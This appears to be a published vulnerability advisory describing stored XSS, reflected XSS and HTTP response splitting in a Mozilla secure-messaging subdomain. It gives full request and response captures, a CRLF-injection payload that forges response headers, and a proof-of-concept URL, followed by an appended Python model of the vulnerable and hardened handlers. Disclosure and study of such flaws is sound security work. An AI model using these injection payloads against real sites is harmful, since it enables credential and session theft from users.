######################################################################
# Exploit Title: Mozilla.org sub-domain Stored-XSS - Reflected-XSS - HTTP Response Splitting
# Date: 03/04/2017
# Author: Yann CAM @ Synetis - ASafety
# Vendor or Software Link: www.mozilla.org
# Version: /
# Category: Stored Cross Site Scripting / Reflected Cross Site Scripting / HTTP Response Splitting
# Google dork:
# Tested on: mozilla.org chimein sub-domain
######################################################################

Mozilla description :
======================================================================
Mozilla is a free-software community, created in 1998 by members of Netscape. The Mozilla community uses, develops, spreads and supports Mozilla products, thereby promoting exclusively free software and open standards, with only minor exceptions. The community is supported institutionally by the Mozilla Foundation and its tax-paying subsidiary, the Mozilla Corporation.

Mozilla produces many products such as the Firefox web browser, Thunderbird e-mail client, Firefox Mobile web browser, Firefox OS mobile operating system, Bugzilla bug tracking system and other projects.

Vulnerabilities description :
======================================================================
The chimein.mozilla.org sub-domain (accessed via HTTPS) provides a secure web messenger application. This application requires authentication: each user is authenticated with a "login / password". Then, to send a message to another user, a public/private key pair is used to encrypt and sign the message. The private key is protected by a passphrase.

This secure web messenger application contains several vulnerabilities :

- A stored XSS is available in the body of each message sent encrypted to other users. Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake Mozilla portals, or capture Mozilla users' credentials such as key/password.
- A reflected XSS is available in the sign up process (login). Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake Mozilla portals, or capture Mozilla users' credentials such as key/password.
- An HTTP Response Splitting is available in the "/message/get" endpoint. This vulnerability can be used to create a Reflected XSS.

Proof of Concept n°1 : Stored Cross-Site Scripting
======================================================================
The chimein.mozilla.org domain (https://chimein.mozilla.org/) provides a very simple "sign up / sign in / send message" process with asymmetric encryption (public key, private key, password and passphrase) to add strong security to message exchange. A simple user can create an account, log in with this account, and send an encrypted message (with a passphrase) to any other registered user.

There are some XSS vulnerabilities. The most critical is a Stored-XSS in the body of any message.

A user is able to create an account as described here :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_001.png

Login = ycam, password = ycam, passphrase = ycam

Then, once logged in, the user can send an arbitrary message to any other user (in the example, the message is sent to the user himself for the Proof of Concept) :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_002.png

The Stored-XSS payload can be injected in the "body" of the message. The user selects a specific passphrase, so the payload is encrypted. Once sent, the message is visible to the logged-in receiver. When this victim user clicks on the message, he has to enter the passphrase used at encryption time.
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_003.png

When the passphrase is entered, the body of the message is decrypted and the Stored-XSS is triggered (PoC : alert(document.domain)).
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_SXSS_004.png

Stored-XSS are very critical vulnerabilities and can be used by an attacker to steal private information such as session cookies or credentials. Through XSS, an attacker can tamper with page rendering, take control of the full browser and use browser exploits to gain privileges on the local system (especially with a dedicated framework for XSS flaws like BeEF : http://beefproject.com/).

This Stored-XSS was tested successfully with the latest Firefox version 49.0.2, latest Chrome version 53 and the latest IE version 11.

In this case, the main Stored-XSS is embedded in a personal message addressed to a victim (the victim needs to enter the passphrase to decrypt the message's body and trigger the payload). This is a serious issue because the XSS is located in a very secure chat system with asymmetric encryption: the payload travels encrypted, so it cannot be filtered server-side and only appears once the victim decrypts the body. An attacker is able to create a fake page, fake prompt or fake "re-authentication" process to steal the victim's password. If the attacker gains access to a victim's account, he can use all the features of the secure chat in place of the legitimate user.
PoC - HTTP request sample (with encrypted payload) :

POST /message/create HTTP/1.1
Host: chimein.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://chimein.mozilla.org/
Content-Length: 1483
Content-Type: text/plain;charset=UTF-8
DNT: 1
Connection: close

login=ycam&password=ycam&sender=ycam&recipient=ycam&subject=ycam&subject_signature=C2sgosxgaKPEqJJwLb5R29A8fqX9wxA30SLqcJzKLkhEDVuAIIZesho736eDtI7GbrjpFBgc9I8E%0D%0A%2FPMRAbK6IZF9O9G%2BkOmy9a%2FmSPY9L8yiFdwk8CXzW%2Fnvmirx3qelwQ87z3cgrxGe8um7Ntc603h2%0D%0AWrux3wQrv5JptqEMC1Cj%2BatQQQ%2FB6ahv9Q6K2z7wmIViR1mcZuNG9V26PwierLoNNOBDwXmChsPI%0D%0AKpy%2F0TgJhkpWj%2BPO3YIvxy015imeISUgmZyTmOaJAy7%2FOQzvw5GUAS5nTG%2FtU79kO7AlhQLTgjlL%0D%0AE3uKE2jM2ACuwtqZNeSpNTUeyGBLCxHD18vqMw%3D%3D&body=O8E%2BSCVlBZiL8xsg0yEg%2BK5%2BjdHKkuQA89z8FpLDekOT3CUa43B%2FQw%2BBxyCTgccngdRp7en7Zi%2BM%0D%0AwMgDouqt8f1NGa8hxk4xP0lxN0vsR8dz1DyY2etgtGtSY8ehWDoK&body_signature=kFLh%2BgNR1Ow2zuxqRebnYmiB%2FN2GEYWSFdLdK4dfdM2N5pKJw5eXsfu1YyKkznYEHU1c1z%2BYF13e%0D%0AzyWBWtwmSPff%2B6JFWIHGqYI2RR%2BqszbAduHwHSniFPkz0gKntc%2FxOe8GFX62z78pAPJfZ4tLyg8p%0D%0ALobVsLDjaipcRsy4tC0LWz56zjCWbACKPP9Gwi0VGng2Ny3KYoTSt%2B6t7GkCWf799ztY8R0WYJ8q%0D%0AskQAYD5LuHpdadi8%2B8RDdgYOaepyYPGfjuhJXXsqec9rivk84mkZSa8cAtXgrFF4bnj%2BF9z8KFgc%0D%0AvhiVAG71i65AVRbJ6pPR2CKjnnOhSkBjldNIuQ%3D%3D&session_key=a3EPAkTnptCVn9FSgmfTkpgzgjQgOGuYLFG%2BMmtmZjcwAPJjXePxH8%2F1XWWolhPn1fRmf4j9ybmo%0D%0AlXYOg4Fj1ss8k2HRcugxridBTkZ53dd0Af0qEHeSsiA1Rsm0d2G76k6qsWzgD55WBc6nuEXiOrzM%0D%0ATxVPIcT%2FvLbjTA0hrnzmm%2Ftiyq31YPVOYq3Di95urw38DFJIRPKiP%2FcJ0GoWkUrcB6OK8lCfvx0K%0D%0AWsS%2BPpAB%2Fc1xBUoG0TmFKZRkCXx8toykvz7cqC6hwZHbWRj4A5cLbnIrYdIXZ%2B2AkjhwcNzqWHQb%0D%0AHHm1wN6fkalHKXW7%2BwM2ctioB1JaE3gYE7WmGA%3D%3D&session_key_iv=zOtfAHFpmaW%2Bhm2xcJhPxw%3D%3D&

Proof of Concept n°2 : Reflected Cross-Site Scripting
======================================================================
There is another Reflected XSS vulnerability in the "login" text input during registration (the user login needs to be new at each sign up) :

Payload injection :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_RXSS_001.png

Reflected XSS fired :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_RXSS_002.png

Proof of Concept n°3 : HTTP Response Splitting leveraged to Reflected XSS
======================================================================
Exchanges are made through API calls: for example, when a user POSTs a message, the "/message/create" entry point is called. Messages are listed through "/message/list", and to consult a specific message the following request is made (as an example, the message ID 57 owned by the user ycam with password ycam is used as Proof of Concept) :

POST /message/get HTTP/1.1
Host: chimein.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

login=ycam&password=ycam&id=57

The resulting data look like this (JSON) :

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 1525
Date: Fri, 21 Oct 2016 00:05:14 GMT
Connection: close
{"id":57,"sender":"ycam","recipient":"ycam","subject":"ycam","subject_signature":"C2sgosxgaKPEqJJwLb5R29A8fqX9wxA30SLqcJzKLkhEDVuAIIZesho736eDtI7GbrjpFBgc9I8E\r\n/PMRAbK6IZF9O9G+kOmy9a/mSPY9L8yiFdwk8CXzW/nvmirx3qelwQ87z3cgrxGe8um7Ntc603h2\r\nWrux3wQrv5JptqEMC1Cj+atQQQ/B6ahv9Q6K2z7wmIViR1mcZuNG9V26PwierLoNNOBDwXmChsPI\r\nKpy/0TgJhkpWj+PO3YIvxy015imeISUgmZyTmOaJAy7/OQzvw5GUAS5nTG/tU79kO7AlhQLTgjlL\r\nE3uKE2jM2ACuwtqZNeSpNTUeyGBLCxHD18vqMw==","body":"O8E+SCVlBZiL8xsg0yEg+K5+jdHKkuQA89z8FpLDekOT3CUa43B/Qw+BxyCTgccngdRp7en7Zi+M\r\nwMgDouqt8f1NGa8hxk4xP0lxN0vsR8dz1DyY2etgtGtSY8ehWDoK","body_signature":"kFLh+gNR1Ow2zuxqRebnYmiB/N2GEYWSFdLdK4dfdM2N5pKJw5eXsfu1YyKkznYEHU1c1z+YF13e\r\nzyWBWtwmSPff+6JFWIHGqYI2RR+qszbAduHwHSniFPkz0gKntc/xOe8GFX62z78pAPJfZ4tLyg8p\r\nLobVsLDjaipcRsy4tC0LWz56zjCWbACKPP9Gwi0VGng2Ny3KYoTSt+6t7GkCWf799ztY8R0WYJ8q\r\nskQAYD5LuHpdadi8+8RDdgYOaepyYPGfjuhJXXsqec9rivk84mkZSa8cAtXgrFF4bnj+F9z8KFgc\r\nvhiVAG71i65AVRbJ6pPR2CKjnnOhSkBjldNIuQ==","session_key":"a3EPAkTnptCVn9FSgmfTkpgzgjQgOGuYLFG+MmtmZjcwAPJjXePxH8/1XWWolhPn1fRmf4j9ybmo\r\nlXYOg4Fj1ss8k2HRcugxridBTkZ53dd0Af0qEHeSsiA1Rsm0d2G76k6qsWzgD55WBc6nuEXiOrzM\r\nTxVPIcT/vLbjTA0hrnzmm/tiyq31YPVOYq3Di95urw38DFJIRPKiP/cJ0GoWkUrcB6OK8lCfvx0K\r\nWsS+PpAB/c1xBUoG0TmFKZRkCXx8toykvz7cqC6hwZHbWRj4A5cLbnIrYdIXZ+2AkjhwcNzqWHQb\r\nHHm1wN6fkalHKXW7+wM2ctioB1JaE3gYE7WmGA==","session_key_iv":"zOtfAHFpmaW+hm2xcJhPxw==","status":"read","sent_date":"2016-10-20T23:05:30.009Z","retrieved_date":"2016-10-20T23:06:45.811Z","read_date":"2016-10-20T23:06:48.066Z"}

Screenshot :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_001.png
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_002.png
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_003.png

If a user changes the value of the "id" POST parameter of the initial request, the following error is returned :

POST /message/get HTTP/1.1
Host: chimein.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

login=ycam&password=ycam&id=xxx

Error received :

HTTP/1.1 500 message xxx does not exist
Date: Fri, 21 Oct 2016 00:07:11 GMT
Connection: close
Content-Length: 0

Screenshot :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_004.png

The "id" value is reflected in the HTTP headers returned by the server (in the status line itself). With the sequence %0a%0d (the newline characters \n and \r), an attacker can forge headers and response content himself :

POST /message/get HTTP/1.1
Host: chimein.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

login=ycam&password=ycam&id=xxx%0a%0dyyy%0a%0dzzz%0a%0d

Response (the injected line breaks are passed through into the status line) :

HTTP/1.1 500 message xxx
yyy
zzz
 does not exist
Date: Fri, 21 Oct 2016 00:08:40 GMT
Connection: close
Content-Length: 0

Screenshot :
https://www.asafety.fr/data/20161021-Chimein.mozilla.org_HRS_005.png

So, with a specific payload, an attacker can forge his own response from the server with the right headers (Content-Type: text/html) and arbitrary source code. Moreover, the payload can be sent either as a GET parameter or as a POST parameter. In GET, the vulnerability is easier to deliver to victims :

https://chimein.mozilla.org/message/get?login=ycam&password=ycam&id=x%0a%0dContent-Length: 100%0a%0dContent-Type: text/html%0a%0d%0a%0d
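As an added example (not part of the advisory and not Chimein's code), the following Python models the status-line reflection described above next to a hardened handler, and parses both responses the way a lenient HTTP client would, so the injected header lines become visible as parsed headers. The function names, the 400/404 handling and the JSON error body are assumptions; the reason phrase "message ... does not exist" is the one observed in the advisory.

```python
import json
from urllib.parse import unquote

# Constructed input: the "id" value from the advisory's GET PoC, percent-decoded.
POC_ID = unquote("x%0a%0dContent-Length: 100%0a%0dContent-Type: text/html%0a%0d%0a%0d")


def build_response_vulnerable(msg_id: str) -> bytes:
    """Models the observed behaviour: the id is concatenated into the status
    line unfiltered, so line breaks inside it start new header lines."""
    status = f"HTTP/1.1 500 message {msg_id} does not exist"
    return f"{status}\r\nConnection: close\r\nContent-Length: 0\r\n\r\n".encode("latin-1")


def build_response_hardened(msg_id: str) -> bytes:
    """Hypothetical fix: allowlist the id (message ids are numeric) and keep
    user input out of the status line and headers entirely; the value is only
    echoed inside a JSON body, where the encoder escapes CR and LF."""
    if msg_id.isascii() and msg_id.isdigit():
        status, body = "HTTP/1.1 404 Not Found", {"error": "message does not exist", "id": int(msg_id)}
    else:
        status, body = "HTTP/1.1 400 Bad Request", {"error": "invalid message id", "id": msg_id}
    payload = json.dumps(body).encode("utf-8")
    head = (f"{status}\r\nContent-Type: application/json\r\n"
            f"Content-Length: {len(payload)}\r\nConnection: close\r\n\r\n")
    return head.encode("latin-1") + payload


def parse_response(raw: bytes):
    """Lenient client-side parse: split on LF and drop stray CR, as many HTTP
    clients do. That tolerance is why the advisory's %0a%0d (LF then CR)
    sequence still yields separate header lines. Returns (status, headers, body)."""
    lines = raw.split(b"\n")
    status_line = lines[0].strip(b"\r").decode("latin-1")
    headers, body = {}, b""
    for i, line in enumerate(lines[1:], start=1):
        line = line.strip(b"\r")
        if not line:  # first blank line terminates the header block
            body = b"\n".join(lines[i + 1:])
            break
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return status_line, headers, body
```

Run against POC_ID, the vulnerable builder yields a response whose parsed headers are the attacker-supplied Content-Length and Content-Type, while the hardened builder returns a 400 whose body carries the id with its control characters JSON-escaped.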